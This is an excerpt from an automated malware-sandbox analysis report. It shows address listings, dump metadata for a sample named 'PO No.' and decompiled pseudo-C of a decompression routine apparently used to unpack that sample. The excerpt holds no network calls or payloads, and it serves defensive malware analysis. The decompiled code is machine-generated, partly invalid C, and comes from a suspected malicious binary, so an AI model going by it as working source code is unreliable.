                                                                      0x00000000
                                                                      0x00407281
                                                                      0x00000000
                                                                      0x00407281
                                                                      0x00000000
                                                                      0x00406f1d
                                                                      0x00406f20
                                                                      0x00406f56
                                                                      0x00407086
                                                                      0x00407086
                                                                      0x00407086
                                                                      0x00407086
                                                                      0x00407089
                                                                      0x00407089
                                                                      0x0040708c
                                                                      0x0040708e
                                                                      0x00407318
                                                                      0x00000000
                                                                      0x00407318
                                                                      0x00407094
                                                                      0x00407097
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040709d
                                                                      0x004070a1
                                                                      0x004070a4
                                                                      0x004070a4
                                                                      0x004070a4
                                                                      0x00000000
                                                                      0x004070a4
                                                                      0x00406f22
                                                                      0x00406f24
                                                                      0x00406f26
                                                                      0x00406f28
                                                                      0x00406f2b
                                                                      0x00406f2c
                                                                      0x00406f2e
                                                                      0x00406f30
                                                                      0x00406f33
                                                                      0x00406f36
                                                                      0x00406f4c
                                                                      0x00406f51
                                                                      0x00406f89
                                                                      0x00406f89
                                                                      0x00406f8d
                                                                      0x00406fb9
                                                                      0x00406fbb
                                                                      0x00406fc2
                                                                      0x00406fc5
                                                                      0x00406fc8
                                                                      0x00406fc8
                                                                      0x00406fcd
                                                                      0x00406fcd
                                                                      0x00406fcf
                                                                      0x00406fd2
                                                                      0x00406fd9
                                                                      0x00406fdc
                                                                      0x00407009
                                                                      0x00407009
                                                                      0x0040700c
                                                                      0x0040700f
                                                                      0x00407083
                                                                      0x00407083
                                                                      0x00407083
                                                                      0x00000000
                                                                      0x00407083
                                                                      0x00407011
                                                                      0x00407017
                                                                      0x0040701a
                                                                      0x0040701d
                                                                      0x00407020
                                                                      0x00407023
                                                                      0x00407026
                                                                      0x00407029
                                                                      0x0040702c
                                                                      0x0040702f
                                                                      0x00407032
                                                                      0x0040704b
                                                                      0x0040704d
                                                                      0x00407050
                                                                      0x00407051
                                                                      0x00407054
                                                                      0x00407056
                                                                      0x00407059
                                                                      0x0040705b
                                                                      0x0040705d
                                                                      0x00407060
                                                                      0x00407062
                                                                      0x00407065
                                                                      0x00407069
                                                                      0x0040706b
                                                                      0x0040706b
                                                                      0x0040706c
                                                                      0x0040706f
                                                                      0x00407072
                                                                      0x00407034
                                                                      0x00407034
                                                                      0x0040703c
                                                                      0x00407041
                                                                      0x00407043
                                                                      0x00407046
                                                                      0x00407046
                                                                      0x00407075
                                                                      0x0040707c
                                                                      0x00407006
                                                                      0x00407006
                                                                      0x00407006
                                                                      0x00407006
                                                                      0x00000000
                                                                      0x0040707e
                                                                      0x00000000
                                                                      0x0040707e
                                                                      0x0040707c
                                                                      0x00406f8f
                                                                      0x00406f92
                                                                      0x00406f94
                                                                      0x00406f97
                                                                      0x00406f9a
                                                                      0x00406f9d
                                                                      0x00406f9f
                                                                      0x00406fa2
                                                                      0x00406fa5
                                                                      0x00406fa5
                                                                      0x00406fa8
                                                                      0x00406fa8
                                                                      0x00406fab
                                                                      0x00406fb2
                                                                      0x00406f86
                                                                      0x00406f86
                                                                      0x00406f86
                                                                      0x00406f86
                                                                      0x00000000
                                                                      0x00406fb4
                                                                      0x00000000
                                                                      0x00406fb4
                                                                      0x00406fb2
                                                                      0x00406f38
                                                                      0x00406f3b
                                                                      0x00406f3d
                                                                      0x00406f40
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c9f
                                                                      0x00406c9f
                                                                      0x00406ca3
                                                                      0x004072e8
                                                                      0x00000000
                                                                      0x004072e8
                                                                      0x00406ca9
                                                                      0x00406cac
                                                                      0x00406caf
                                                                      0x00406cb2
                                                                      0x00406cb5
                                                                      0x00406cb8
                                                                      0x00406cbb
                                                                      0x00406cbd
                                                                      0x00406cc0
                                                                      0x00406cc3
                                                                      0x00406cc6
                                                                      0x00406cc8
                                                                      0x00406cc8
                                                                      0x00406cc8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406e2a
                                                                      0x00406e2a
                                                                      0x00406e2e
                                                                      0x004072f4
                                                                      0x00000000
                                                                      0x004072f4
                                                                      0x00406e34
                                                                      0x00406e37
                                                                      0x00406e3a
                                                                      0x00406e3d
                                                                      0x00406e3f
                                                                      0x00406e3f
                                                                      0x00406e3f
                                                                      0x00406e42
                                                                      0x00406e45
                                                                      0x00406e48
                                                                      0x00406e4b
                                                                      0x00406e4e
                                                                      0x00406e51
                                                                      0x00406e52
                                                                      0x00406e54
                                                                      0x00406e54
                                                                      0x00406e54
                                                                      0x00406e57
                                                                      0x00406e5a
                                                                      0x00406e5d
                                                                      0x00406e60
                                                                      0x00406e60
                                                                      0x00406e60
                                                                      0x00406e63
                                                                      0x00406e65
                                                                      0x00406e65
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004070a7
                                                                      0x004070a7
                                                                      0x004070a7
                                                                      0x004070ab
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004070b1
                                                                      0x004070b4
                                                                      0x004070b7
                                                                      0x004070ba
                                                                      0x004070bc
                                                                      0x004070bc
                                                                      0x004070bc
                                                                      0x004070bf
                                                                      0x004070c2
                                                                      0x004070c5
                                                                      0x004070c8
                                                                      0x004070cb
                                                                      0x004070ce
                                                                      0x004070cf
                                                                      0x004070d1
                                                                      0x004070d1
                                                                      0x004070d1
                                                                      0x004070d4
                                                                      0x004070d7
                                                                      0x004070da
                                                                      0x004070dd
                                                                      0x004070e0
                                                                      0x004070e4
                                                                      0x004070e6
                                                                      0x004070e9
                                                                      0x00000000
                                                                      0x004070eb
                                                                      0x00406e68
                                                                      0x00406e68
                                                                      0x00000000
                                                                      0x00406e68
                                                                      0x004070e9
                                                                      0x0040731e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040694d
                                                                      0x00407355
                                                                      0x00407355
                                                                      0x00000000
                                                                      0x00407355
                                                                      0x004071a2
                                                                      0x00407129
                                                                      0x00407126
                                                                      0x00000000
                                                                      0x00406d5d

                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7afd307a57d874939e6d1f07c4a81c11abd2b71d61e18d684fba0f23c35f734a
                                                                      • Instruction ID: b0583babc1dad824d13d86abae56a1a356e3ceb45be48e511182641c275db258
                                                                      • Opcode Fuzzy Hash: 7afd307a57d874939e6d1f07c4a81c11abd2b71d61e18d684fba0f23c35f734a
                                                                      • Instruction Fuzzy Hash: 8C712471E04228CFDF28CFA8C9447ADBBB1FB44305F15806AD856BB281D7386996DF45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 98%
                                                                      			E00406E77() {
                                                                      				unsigned short _t531;
                                                                      				signed int _t532;
                                                                      				void _t533;
                                                                      				signed int _t534;
                                                                      				signed int _t535;
                                                                      				signed int _t565;
                                                                      				signed int _t568;
                                                                      				signed int _t589;
                                                                      				signed int* _t606;
                                                                      				void* _t613;
                                                                      
                                                                      				L0:
                                                                      				while(1) {
                                                                      					L0:
                                                                      					if( *(_t613 - 0x40) != 0) {
                                                                      						 *(_t613 - 0x84) = 0xb;
                                                                      						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                                                      						goto L132;
                                                                      					} else {
                                                                      						__eax =  *(__ebp - 0x28);
                                                                      						L88:
                                                                      						 *(__ebp - 0x2c) = __eax;
                                                                      						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                      						L89:
                                                                      						__eax =  *(__ebp - 4);
                                                                      						 *(__ebp - 0x80) = 0x15;
                                                                      						__eax =  *(__ebp - 4) + 0xa68;
                                                                      						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                      						L69:
                                                                      						 *(__ebp - 0x84) = 0x12;
                                                                      						while(1) {
                                                                      							L132:
                                                                      							 *(_t613 - 0x54) = _t606;
                                                                      							while(1) {
                                                                      								L133:
                                                                      								_t531 =  *_t606;
                                                                      								_t589 = _t531 & 0x0000ffff;
                                                                      								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                      								if( *(_t613 - 0xc) >= _t565) {
                                                                      									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                      									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                      									 *(_t613 - 0x40) = 1;
                                                                      									_t532 = _t531 - (_t531 >> 5);
                                                                      									 *_t606 = _t532;
                                                                      								} else {
                                                                      									 *(_t613 - 0x10) = _t565;
                                                                      									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                      									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                      								}
                                                                      								if( *(_t613 - 0x10) >= 0x1000000) {
                                                                      									goto L139;
                                                                      								}
                                                                      								L137:
                                                                      								if( *(_t613 - 0x6c) == 0) {
                                                                      									 *(_t613 - 0x88) = 5;
                                                                      									L170:
                                                                      									_t568 = 0x22;
                                                                      									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                      									_t535 = 0;
                                                                      									L172:
                                                                      									return _t535;
                                                                      								}
                                                                      								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                      								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                      								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                      								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                      								L139:
                                                                      								_t533 =  *(_t613 - 0x84);
                                                                      								while(1) {
                                                                      									 *(_t613 - 0x88) = _t533;
                                                                      									while(1) {
                                                                      										L1:
                                                                      										_t534 =  *(_t613 - 0x88);
                                                                      										if(_t534 > 0x1c) {
                                                                      											break;
                                                                      										}
                                                                      										switch( *((intOrPtr*)(_t534 * 4 +  &M0040735D))) {
                                                                      											case 0:
                                                                      												if( *(_t613 - 0x6c) == 0) {
                                                                      													goto L170;
                                                                      												}
                                                                      												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                      												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                      												_t534 =  *( *(_t613 - 0x70));
                                                                      												if(_t534 > 0xe1) {
                                                                      													goto L171;
                                                                      												}
                                                                      												_t538 = _t534 & 0x000000ff;
                                                                      												_push(0x2d);
                                                                      												asm("cdq");
                                                                      												_pop(_t570);
                                                                      												_push(9);
                                                                      												_pop(_t571);
                                                                      												_t609 = _t538 / _t570;
                                                                      												_t540 = _t538 % _t570 & 0x000000ff;
                                                                      												asm("cdq");
                                                                      												_t604 = _t540 % _t571 & 0x000000ff;
                                                                      												 *(_t613 - 0x3c) = _t604;
                                                                      												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                      												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                      												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                      												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                      													L10:
                                                                      													if(_t612 == 0) {
                                                                      														L12:
                                                                      														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                      														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                      														goto L15;
                                                                      													} else {
                                                                      														goto L11;
                                                                      													}
                                                                      													do {
                                                                      														L11:
                                                                      														_t612 = _t612 - 1;
                                                                      														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                      													} while (_t612 != 0);
                                                                      													goto L12;
                                                                      												}
                                                                      												if( *(_t613 - 4) != 0) {
                                                                      													GlobalFree( *(_t613 - 4));
                                                                      												}
                                                                      												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                      												 *(_t613 - 4) = _t534;
                                                                      												if(_t534 == 0) {
                                                                      													goto L171;
                                                                      												} else {
                                                                      													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                      													goto L10;
                                                                      												}
                                                                      											case 1:
                                                                      												L13:
                                                                      												__eflags =  *(_t613 - 0x6c);
                                                                      												if( *(_t613 - 0x6c) == 0) {
                                                                      													 *(_t613 - 0x88) = 1;
                                                                      													goto L170;
                                                                      												}
                                                                      												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                      												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                      												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                      												_t45 = _t613 - 0x48;
                                                                      												 *_t45 =  *(_t613 - 0x48) + 1;
                                                                      												__eflags =  *_t45;
                                                                      												L15:
                                                                      												if( *(_t613 - 0x48) < 4) {
                                                                      													goto L13;
                                                                      												}
                                                                      												_t546 =  *(_t613 - 0x40);
                                                                      												if(_t546 ==  *(_t613 - 0x74)) {
                                                                      													L20:
                                                                      													 *(_t613 - 0x48) = 5;
                                                                      													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                      													goto L23;
                                                                      												}
                                                                      												 *(_t613 - 0x74) = _t546;
                                                                      												if( *(_t613 - 8) != 0) {
                                                                      													GlobalFree( *(_t613 - 8));
                                                                      												}
                                                                      												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                      												 *(_t613 - 8) = _t534;
                                                                      												if(_t534 == 0) {
                                                                      													goto L171;
                                                                      												} else {
                                                                      													goto L20;
                                                                      												}
                                                                      											case 2:
                                                                      												L24:
                                                                      												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                      												 *(_t613 - 0x84) = 6;
                                                                      												 *(_t613 - 0x4c) = _t553;
                                                                      												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                      												L132:
                                                                      												 *(_t613 - 0x54) = _t606;
                                                                      												goto L133;
                                                                      											case 3:
                                                                      												L21:
                                                                      												__eflags =  *(_t613 - 0x6c);
                                                                      												if( *(_t613 - 0x6c) == 0) {
                                                                      													 *(_t613 - 0x88) = 3;
                                                                      													goto L170;
                                                                      												}
                                                                      												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                      												_t67 = _t613 - 0x70;
                                                                      												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                      												__eflags =  *_t67;
                                                                      												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                      												L23:
                                                                      												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                      												if( *(_t613 - 0x48) != 0) {
                                                                      													goto L21;
                                                                      												}
                                                                      												goto L24;
                                                                      											case 4:
                                                                      												L133:
                                                                      												_t531 =  *_t606;
                                                                      												_t589 = _t531 & 0x0000ffff;
                                                                      												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                      												if( *(_t613 - 0xc) >= _t565) {
                                                                      													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                      													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                      													 *(_t613 - 0x40) = 1;
                                                                      													_t532 = _t531 - (_t531 >> 5);
                                                                      													 *_t606 = _t532;
                                                                      												} else {
                                                                      													 *(_t613 - 0x10) = _t565;
                                                                      													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                      													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                      												}
                                                                      												if( *(_t613 - 0x10) >= 0x1000000) {
                                                                      													goto L139;
                                                                      												}
                                                                      											case 5:
                                                                      												goto L137;
                                                                      											case 6:
                                                                      												__edx = 0;
                                                                      												__eflags =  *(__ebp - 0x40);
                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                      													__eax =  *(__ebp - 4);
                                                                      													__ecx =  *(__ebp - 0x38);
                                                                      													 *(__ebp - 0x34) = 1;
                                                                      													 *(__ebp - 0x84) = 7;
                                                                      													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                      													while(1) {
                                                                      														L132:
                                                                      														 *(_t613 - 0x54) = _t606;
                                                                      														goto L133;
                                                                      													}
                                                                      												}
                                                                      												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                      												__esi =  *(__ebp - 0x60);
                                                                      												__cl = 8;
                                                                      												__cl = 8 -  *(__ebp - 0x3c);
                                                                      												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                      												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                      												__ecx =  *(__ebp - 0x3c);
                                                                      												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                      												__ecx =  *(__ebp - 4);
                                                                      												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                      												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                      												__eflags =  *(__ebp - 0x38) - 4;
                                                                      												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                      												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                      												if( *(__ebp - 0x38) >= 4) {
                                                                      													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                      													if( *(__ebp - 0x38) >= 0xa) {
                                                                      														_t98 = __ebp - 0x38;
                                                                      														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                      														__eflags =  *_t98;
                                                                      													} else {
                                                                      														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                      													}
                                                                      												} else {
                                                                      													 *(__ebp - 0x38) = 0;
                                                                      												}
                                                                      												__eflags =  *(__ebp - 0x34) - __edx;
                                                                      												if( *(__ebp - 0x34) == __edx) {
                                                                      													__ebx = 0;
                                                                      													__ebx = 1;
                                                                      													goto L61;
                                                                      												} else {
                                                                      													__eax =  *(__ebp - 0x14);
                                                                      													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                      													__eflags = __eax -  *(__ebp - 0x74);
                                                                      													if(__eax >=  *(__ebp - 0x74)) {
                                                                      														__eax = __eax +  *(__ebp - 0x74);
                                                                      														__eflags = __eax;
                                                                      													}
                                                                      													__ecx =  *(__ebp - 8);
                                                                      													__ebx = 0;
                                                                      													__ebx = 1;
                                                                      													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                      													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                      													goto L41;
                                                                      												}
                                                                      											case 7:
                                                                      												__eflags =  *(__ebp - 0x40) - 1;
                                                                      												if( *(__ebp - 0x40) != 1) {
                                                                      													__eax =  *(__ebp - 0x24);
                                                                      													 *(__ebp - 0x80) = 0x16;
                                                                      													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                      													__eax =  *(__ebp - 0x28);
                                                                      													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                      													__eax =  *(__ebp - 0x2c);
                                                                      													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                      													__eax = 0;
                                                                      													__eflags =  *(__ebp - 0x38) - 7;
                                                                      													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                      													__al = __al & 0x000000fd;
                                                                      													__eax = (__eflags >= 0) - 1 + 0xa;
                                                                      													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                      													__eax =  *(__ebp - 4);
                                                                      													__eax =  *(__ebp - 4) + 0x664;
                                                                      													__eflags = __eax;
                                                                      													 *(__ebp - 0x58) = __eax;
                                                                      													goto L69;
                                                                      												}
                                                                      												__eax =  *(__ebp - 4);
                                                                      												__ecx =  *(__ebp - 0x38);
                                                                      												 *(__ebp - 0x84) = 8;
                                                                      												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                      												while(1) {
                                                                      													L132:
                                                                      													 *(_t613 - 0x54) = _t606;
                                                                      													goto L133;
                                                                      												}
                                                                      											case 8:
                                                                      												__eflags =  *(__ebp - 0x40);
                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                      													__eax =  *(__ebp - 4);
                                                                      													__ecx =  *(__ebp - 0x38);
                                                                      													 *(__ebp - 0x84) = 0xa;
                                                                      													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                      												} else {
                                                                      													__eax =  *(__ebp - 0x38);
                                                                      													__ecx =  *(__ebp - 4);
                                                                      													__eax =  *(__ebp - 0x38) + 0xf;
                                                                      													 *(__ebp - 0x84) = 9;
                                                                      													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                      													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                      												}
                                                                      												while(1) {
                                                                      													L132:
                                                                      													 *(_t613 - 0x54) = _t606;
                                                                      													goto L133;
                                                                      												}
                                                                      											case 9:
                                                                      												__eflags =  *(__ebp - 0x40);
                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                      													goto L89;
                                                                      												}
                                                                      												__eflags =  *(__ebp - 0x60);
                                                                      												if( *(__ebp - 0x60) == 0) {
                                                                      													goto L171;
                                                                      												}
                                                                      												__eax = 0;
                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                      												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                      												__eflags = _t259;
                                                                      												0 | _t259 = _t259 + _t259 + 9;
                                                                      												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                      												goto L76;
                                                                      											case 0xa:
                                                                      												goto L0;
                                                                      											case 0xb:
                                                                      												__eflags =  *(__ebp - 0x40);
                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                      													__ecx =  *(__ebp - 0x24);
                                                                      													__eax =  *(__ebp - 0x20);
                                                                      													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                      												} else {
                                                                      													__eax =  *(__ebp - 0x24);
                                                                      												}
                                                                      												__ecx =  *(__ebp - 0x28);
                                                                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                      												goto L88;
                                                                      											case 0xc:
                                                                      												L99:
                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                      													 *(__ebp - 0x88) = 0xc;
                                                                      													goto L170;
                                                                      												}
                                                                      												__ecx =  *(__ebp - 0x70);
                                                                      												__eax =  *(__ebp - 0xc);
                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												_t334 = __ebp - 0x70;
                                                                      												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                      												__eflags =  *_t334;
                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												__eax =  *(__ebp - 0x2c);
                                                                      												goto L101;
                                                                      											case 0xd:
                                                                      												L37:
                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                      													 *(__ebp - 0x88) = 0xd;
                                                                      													goto L170;
                                                                      												}
                                                                      												__ecx =  *(__ebp - 0x70);
                                                                      												__eax =  *(__ebp - 0xc);
                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												_t122 = __ebp - 0x70;
                                                                      												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                      												__eflags =  *_t122;
                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												L39:
                                                                      												__eax =  *(__ebp - 0x40);
                                                                      												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                      												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                      													goto L48;
                                                                      												}
                                                                      												__eflags = __ebx - 0x100;
                                                                      												if(__ebx >= 0x100) {
                                                                      													goto L54;
                                                                      												}
                                                                      												L41:
                                                                      												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                      												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                      												__ecx =  *(__ebp - 0x58);
                                                                      												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                      												 *(__ebp - 0x48) = __eax;
                                                                      												__eax = __eax + 1;
                                                                      												__eax = __eax << 8;
                                                                      												__eax = __eax + __ebx;
                                                                      												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                      												__ax =  *__esi;
                                                                      												 *(__ebp - 0x54) = __esi;
                                                                      												__edx = __ax & 0x0000ffff;
                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                      													__cx = __ax;
                                                                      													 *(__ebp - 0x40) = 1;
                                                                      													__cx = __ax >> 5;
                                                                      													__eflags = __eax;
                                                                      													__ebx = __ebx + __ebx + 1;
                                                                      													 *__esi = __ax;
                                                                      												} else {
                                                                      													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                      													0x800 = 0x800 - __edx;
                                                                      													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                      													__ebx = __ebx + __ebx;
                                                                      													 *__esi = __cx;
                                                                      												}
                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      													goto L39;
                                                                      												} else {
                                                                      													goto L37;
                                                                      												}
                                                                      											case 0xe:
                                                                      												L46:
                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                      													 *(__ebp - 0x88) = 0xe;
                                                                      													goto L170;
                                                                      												}
                                                                      												__ecx =  *(__ebp - 0x70);
                                                                      												__eax =  *(__ebp - 0xc);
                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												_t156 = __ebp - 0x70;
                                                                      												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                      												__eflags =  *_t156;
                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
